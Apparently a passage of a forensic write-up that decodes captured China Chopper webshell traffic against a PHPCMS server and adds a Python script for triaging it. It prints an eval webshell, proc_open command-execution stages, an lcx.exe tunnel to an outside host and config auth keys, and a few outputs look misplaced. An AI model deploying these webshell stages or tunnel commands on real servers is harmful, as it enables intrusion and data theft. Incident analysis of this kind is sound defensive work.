@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// Write the file C:\\phpStudy\\WWW\\1.txt
<?php @eval($_POST['t'])?>
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\
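As an added example (my own code, not the writeup's grep/sed/ipython pipeline or any tool it names), the script below does in one place what the pipeline above does for 9.php and what the base64 decode step does for the second shell: it walks an `http.txt`-style dump, keeps only the POSTs carrying the two traffic markers the writeup keys on (the spider User-Agent and `array_map`), recovers the base64 stage from the body, and labels each decoded stage by the action it performs (system info, directory listing, command execution, file read, file write) together with its target. The parameter names `t`/`z0` and the exact stage layout in the constructed requests are assumptions modelled on the shapes shown above; the whole sample dump is constructed.

```python
"""Triage China-Chopper-style webshell requests from an HTTP text dump.

Added example, not part of the original writeup or any tool it mentions.
Assumptions, labelled: the POST body carries the PHP stage as a base64 string
in a URL-encoded parameter (the writeup's grep/sed/base64 pipeline relies on
the same shape), and the sample requests below are constructed, reusing
stage text of the kind decoded in the writeup so the classifier is checkable.
"""
import base64
import re
from urllib.parse import quote, unquote

SPIDER_UA = "Baiduspider/2.0"  # traffic marker the writeup keys on

# (action, pattern in the decoded stage, PHP variable holding the target)
STAGE_RULES = [
    ("exec",     re.compile(r"proc_open\("),                                  "s"),
    ("upload",   re.compile(r"@fwrite\(fopen\(\$f,'w'\)"),                    "f"),
    ("write",    re.compile(r"fwrite\(fopen\('([^']+)','w'\),\$_POST"),       None),
    ("read",     re.compile(r"readfile\(\$F\)|fread\(\$P,filesize\(\$F\)\)"), "F"),
    ("list_dir", re.compile(r"@opendir\(\$D\)"),                              "D"),
    ("sysinfo",  re.compile(r"php_uname\(\)"),                                None),
]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
REQ_SPLIT = re.compile(r"^(?=POST |GET )", re.M)


def decode_stage(body):
    """Return the decoded PHP stage hidden in a URL-encoded POST body, else None."""
    for run in B64_RUN.findall(unquote(body)):
        try:
            php = base64.b64decode(run, validate=True).decode("latin-1")
        except ValueError:
            continue
        if php.startswith("@ini_set("):  # every stage in the capture opens this way
            return php
    return None


def classify_stage(php):
    """Map a decoded stage to (action, target path or command line)."""
    for action, pattern, var in STAGE_RULES:
        m = pattern.search(php)
        if not m:
            continue
        if var is None:
            return action, (m.group(1) if m.groups() else "")
        tm = re.search(r"\$" + var + r"=(['\"])(.*?)\1;", php)
        return action, (tm.group(2) if tm else "")
    return "unknown", ""


def triage_dump(dump):
    """Walk an http.txt-style dump; report (path, action, target) per shell request."""
    findings = []
    for req in REQ_SPLIT.split(dump):
        if not req.startswith("POST "):
            continue
        head, _, body = req.partition("\n\n")
        if SPIDER_UA not in head or "array_map" not in body:
            continue
        php = decode_stage(body)
        if php is None:
            continue
        findings.append((head.split(" ", 2)[1],) + classify_stage(php))
    return findings


# --- constructed sample traffic ---------------------------------------------
PREFIX = '@ini_set("display_errors","0");@set_time_limit(0);echo("X@Y");'
SAMPLE_STAGES = [
    ("/9.php", r'''$D=dirname(__FILE__);$R="{$D}\t";$R.=php_uname();print $R;'''),
    ("/9.php", r'''$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);while($N=@readdir($F)){echo $N;}'''),
    ("/9.php", r'''$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$fp=proc_open($p.' /c '.$s,$a,$pipes);'''),
    ("/9.php", r'''$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');@readfile($F);'''),
    ("/9.php", r'''echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';'''),
    ("/uploadfile/2017/0905/20170905055411283.php",
     r'''$F='/var/www/html/caches/configs/system.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));'''),
]


def build_request(path, stage):
    """One constructed POST in the shape the dump shows (parameter names assumed)."""
    b64 = quote(base64.b64encode((PREFIX + stage + 'echo("X@Y");die();').encode()).decode(), safe="")
    return (f"POST {path} HTTP/1.1\nHost: 192.168.20.117\n"
            "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\n"
            f"Content-Type: application/x-www-form-urlencoded\n\nt=array_map&z0={b64}\n")


SAMPLE_DUMP = ("GET /robots.txt HTTP/1.1\nHost: 192.168.20.117\nUser-Agent: curl/7.0\n\n"
               + "".join(build_request(p, s) for p, s in SAMPLE_STAGES))

if __name__ == "__main__":
    for path, action, target in triage_dump(SAMPLE_DUMP):
        print(f"{path:45} {action:9} {target}")
```

The per-request table this produces is the timeline a responder wants from such a capture: which shell was used, in what order, and which paths, commands and config files were touched, so that credential rotation (the database password in common.inc.php, the local accounts dumped to log.txt) and cleanup (9.php, 1.txt, the uploaded binaries) can be scoped from the traffic alone.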
Then look at the other webshell file:
grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64
Then decode it in ipython:
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         print line[2:-12].decode("base64")
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory /var/www/html/include/crons/
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory /var/www/html/include/
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory /var/www/html/include/
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory /var/www/html/
X@Yphpsso_server/ 2017-09-03 03:31:30 4096 0777
api/ 2017-09-03 03:31:44 4096 0777
statics/ 2017-09-03 03:31:44 4096 0777
caches/ 2017-09-03 03:45:14 4096 0777
./ 2017-09-03 03:38:34 4096 0777
html/ 2017-09-03 03:37:50 4096 0777
phpcms/ 2017-09-03 03:31:27 4096 0777
../ 2017-09-03 03:30:49 4096 0755
uploadfile/ 2017-09-05 02:25:38 4096 0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php 2017-09-03 03:31:44 3593 0777
favicon.ico 2017-09-03 03:31:44 3158 0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php 2017-09-03 03:31:44 48 0777
robots.txt 2017-09-03 03:31:44 170 0777
index.php 2017-09-03 03:31:44 313 0777
index.html 2017-09-05 00:13:08 9578 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the contents of the file /var/www/html/api.php
<?php
/**
* index.php API ....
*
* @copyright (C) 2005-2010 PHPCMS
* @license http://www.phpcms.cn/license/
* @lastmodify 2010-7-26
*/
define('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
include PHPCMS_PATH.'phpcms/base.php';
$param = pc_base::load_sys_class('param');
$_userid = param::get_cookie('_userid');
if($_userid) {
$member_db = pc_base::load_model('member_model');
$_userid = intval($_userid);
$memberinfo = $member_db->get_one(array('userid'=>$_userid),'islock');
if($memberinfo['islock']) exit('<h1>Bad Request!</h1>');
}
$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');
if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback'])) unset($_GET['callback']);
if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {
include PHPCMS_PATH.'api/'.$op.'.php';
} else {
exit('API handler does not exist');
}
?>
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory /var/www/html/phpcms/
model/ 2017-09-03 03:31:17 4096 0777
libs/ 2017-09-03 03:31:16 4096 0777
languages/ 2017-09-03 03:31:15 4096 0777
./ 2017-09-03 03:31:27 4096 0777
plugin/ 2017-09-03 03:31:27 4096 0777
templates/ 2017-09-03 03:31:27 4096 0777
../ 2017-09-03 03:38:34 4096 0777
modules/ 2017-09-03 03:31:27 4096 0777
base.php 2017-09-03 03:31:15 8462 0777
index.html 2017-09-03 03:31:15 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the contents of the file /var/www/html/phpcms/base.php
<?php
/**
* base.php PHPCMS............
*
* @copyright (C) 2005-2010 PHPCMS
* @license http://www.phpcms.cn/license/
* @lastmodify 2010-6-7
*/
define('IN_PHPCMS', true);
//PHPCMS........
define('PC_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
if(!defined('PHPCMS_PATH')) define('PHPCMS_PATH', PC_PATH.'..'.DIRECTORY_SEPARATOR);
...
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory /var/www/html/caches/
caches_admin/ 2017-09-03 03:37:50 4096 0777
caches_content/ 2017-09-03 03:37:50 4096 0777
poster_js/ 2017-09-03 03:37:50 4096 0777
bakup/ 2017-09-03 03:37:50 4096 0777
caches_commons/ 2017-09-03 03:37:50 4096 0777
caches_tpl_data/ 2017-09-03 03:37:50 4096 0777
caches_linkage/ 2017-09-03 03:37:50 4096 0777
caches_model/ 2017-09-03 03:37:50 4096 0777
./ 2017-09-03 03:45:14 4096 0777
vote_js/ 2017-09-03 03:37:50 4096 0777
caches_search/ 2017-09-03 03:38:33 4096 0755
caches_scan/ 2017-09-03 03:37:50 4096 0777
caches_member/ 2017-09-03 03:37:50 4096 0777
sessions/ 2017-09-03 03:37:50 4096 0777
../ 2017-09-03 03:38:34 4096 0777
configs/ 2017-09-03 03:37:50 4096 0777
caches_template/ 2017-09-03 03:45:14 4096 0777
install.lock 2017-09-03 03:38:34 0 0644
error_log.php 2017-09-05 02:54:12 769 0644
index.html 2017-09-03 03:31:45 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory /var/www/html/caches/configs/
./ 2017-09-03 03:37:50 4096 0777
../ 2017-09-03 03:45:14 4096 0777
ku6server.php 2017-09-03 03:31:45 208 0777
sub_config.php 2017-09-03 03:31:45 1376 0777
route.php 2017-09-03 03:31:45 803 0777
credit.php 2017-09-03 03:31:45 122 0777
cache.php 2017-09-03 03:31:45 330 0777
database.php 2017-09-03 03:38:32 324 0777
model_config.php 2017-09-03 03:31:45 52 0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php 2017-09-03 03:31:45 781 0777
snda.php 2017-09-03 03:31:45 51 0777
system.php 2017-09-05 00:11:58 2430 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/system.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// read the contents of the file /var/www/html/caches/configs/system.php
X@Y<?php
return array(
//........
'web_path' => '/',
//Session....
'session_storage' => 'mysql',
'session_ttl' => 1800,
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,
//Cookie....
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
//............
'tpl_root' => 'templates/', //................
'tpl_name' => 'default', //................
'tpl_css' => 'default', //............
'tpl_referesh' => 1,
'tpl_edit'=> 0,//....................
//............
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/', //........
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',//................
'charset' => 'gbk', //..........
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0, //................
17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149
'admin_log' => 1, //....................
'errorlog' => 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL', //....
'lang' => 'zh-cn', //..........
'lock_ex' => '1', //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1', //........phpsso
'phpsso_appid' => '1', //....id
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server', //........
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',//................
'safe_card'=>'1',//..............
'connect_enable' => '1', //..................
'sina_akey' => '', //sina AKEY
'sina_skey' => '', //sina SKEY
'snda_akey' => '', //.......... akey
'snda_skey' => '', //.......... skey
'qq_akey' => '', //qq skey
'qq_skey' => '', //qq skey
'qq_appkey' => '', //QQ........ appkey
'qq_appid' => '', //QQ........ appid
'qq_callback' => '', //QQ........ callback
'admin_url' => '', //..................
);
?>
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// run the command whoami
www-data
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// run the command uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// run the command: pwd (the payload also calls ipconfig, a Windows command that does not exist on this Linux host)
/var/www/html/uploadfile/2017/0905
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// run the command ifconfig
ens33 Link encap:Ethernet HWaddr 00:0c:29:da:d6:4e
inet addr:192.168.20.88 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:162871217 (162.8 MB) TX bytes:5569466 (5.5 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:227 errors:0 dropped:0 overruns:0 frame:0
TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:20038 (20.0 KB) TX bytes:20038 (20.0 KB)
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/include/
ERROR:// Path Not Found Or No Permission!
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/
./ 2017-09-03 03:30:49 4096 0755
html/ 2017-09-03 03:38:34 4096 0777
../ 2017-09-03 00:57:48 4096 0755
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/
phpsso_server/ 2017-09-03 03:31:30 4096 0777
api/ 2017-09-03 03:31:44 4096 0777
statics/ 2017-09-03 03:31:44 4096 0777
caches/ 2017-09-03 03:45:14 4096 0777
./ 2017-09-03 03:38:34 4096 0777
html/ 2017-09-03 03:37:50 4096 0777
phpcms/ 2017-09-03 03:31:27 4096 0777
../ 2017-09-03 03:30:49 4096 0755
uploadfile/ 2017-09-05 02:25:38 4096 0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php 2017-09-03 03:31:44 3593 0777
favicon.ico 2017-09-03 03:31:44 3158 0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php 2017-09-03 03:31:44 48 0777
robots.txt 2017-09-03 03:31:44 170 0777
index.php 2017-09-03 03:31:44 313 0777
index.html 2017-09-05 00:13:08 9578 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/phpcms/
./ 2017-09-03 03:31:16 4096 0777
classes/ 2017-09-03 03:31:16 4096 0777
data/ 2017-09-03 03:31:16 4096 0777
../ 2017-09-03 03:31:27 4096 0777
functions/ 2017-09-03 03:31:16 4096 0777
index.html 2017-09-03 03:31:16 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/phpcms/libs/
./ 2017-09-03 03:31:16 4096 0777
classes/ 2017-09-03 03:31:16 4096 0777
data/ 2017-09-03 03:31:16 4096 0777
../ 2017-09-03 03:31:27 4096 0777
functions/ 2017-09-03 03:31:16 4096 0777
index.html 2017-09-03 03:31:16 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/phpcms/libs/data/
./ 2017-09-03 03:31:16 4096 0777
font/ 2017-09-03 03:31:16 4096 0777
../ 2017-09-03 03:31:16 4096 0777
ipdata/ 2017-09-03 03:31:16 4096 0777
dict/ 2017-09-03 03:31:16 4096 0777
